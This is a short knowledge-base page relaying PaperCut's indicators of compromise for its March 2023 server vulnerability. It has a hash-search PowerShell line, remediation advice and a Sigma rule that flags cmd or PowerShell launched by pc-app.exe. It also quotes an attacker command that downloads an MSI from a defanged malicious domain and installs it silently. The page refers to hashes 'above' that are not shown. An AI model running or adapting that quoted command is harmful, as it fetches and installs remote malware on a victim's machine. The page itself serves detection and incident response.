TBS Libraries KB

PaperCut vulnerability (March 2023) - Indicators of Compromise (IOCs)

Source: https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#faqs

How do I know if my server has been exploited? 

 We currently recommend looking for the following Indicators of Compromise (IOCs) to determine if it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging and endpoint protection software you may be able to detect the following. 

 

You can search the entire system for the hashes above
 

Get-ChildItem "_search_location_" -Recurse | Get-FileHash | Where-Object hash -eq _hash_here_ | Select path

Simply replace _search_location_ with what directory you wish to search and replace _hash_here_ with the hash of the file you wish to find. Search location can be the drive as well - at least IIRC.


```

 cmd /c “powershell.exe -nop -w hidden
 Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’
 -OutFile ‘setup.msi’ ”

 cmd /c “msiexec /i setup.msi /qn  IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\\@@

```

 

```

 title: PaperCut MF/NG Vulnerability 
 authors: Huntress DE&TH Team 
 description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG 
 logsource: 
   category: process_creation 
   product: windows 
 detection: 
   selection: 
     ParentImage|endswith: “\\pc-app.exe” 
     Image|endswith:  
       - “\\cmd.exe” 
       - “\\powershell.exe” 
   condition: selection 
 level: high 
 falsepositives: 
     - Expected admin activity 

```

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior. In addition we recommend you implement your security response procedures and carry out best practices around potential compromise. Also see the “How do I retain my data when restoring my Application Server?” question below.

 We will update this question with more details as we find more information from our customer base and security community.